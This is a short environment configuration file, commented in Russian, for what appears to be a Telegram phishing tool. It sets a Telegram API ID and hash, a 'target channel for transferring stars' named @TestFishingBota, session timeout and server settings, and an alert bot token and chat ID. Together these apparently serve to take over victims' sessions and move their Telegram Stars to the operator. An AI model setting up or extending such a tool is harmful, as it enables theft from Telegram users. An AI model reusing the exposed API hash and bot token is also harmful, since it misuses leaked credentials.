# ОБЯЗАТЕЛЬНО ПОЛУЧИТЕ НА my.telegram.org
API_ID=21367522
API_HASH=ffcea3a0f0d1f63daf33335936570e21

# Целевой канал для перевода звезд
TARGET_CHANNEL=@TestFishingBota
TARGET_MESSAGE_ID=2

# Настройки сервера
PORT=3000
SESSION_TIMEOUT=1800000

# Опционально: уведомления в Telegram
ALERT_BOT_TOKEN=7811987660:AAFyMlCJkoT8lAJZ830lHTlhzdpJRIerqKQ
ALERT_CHAT_ID=7738435649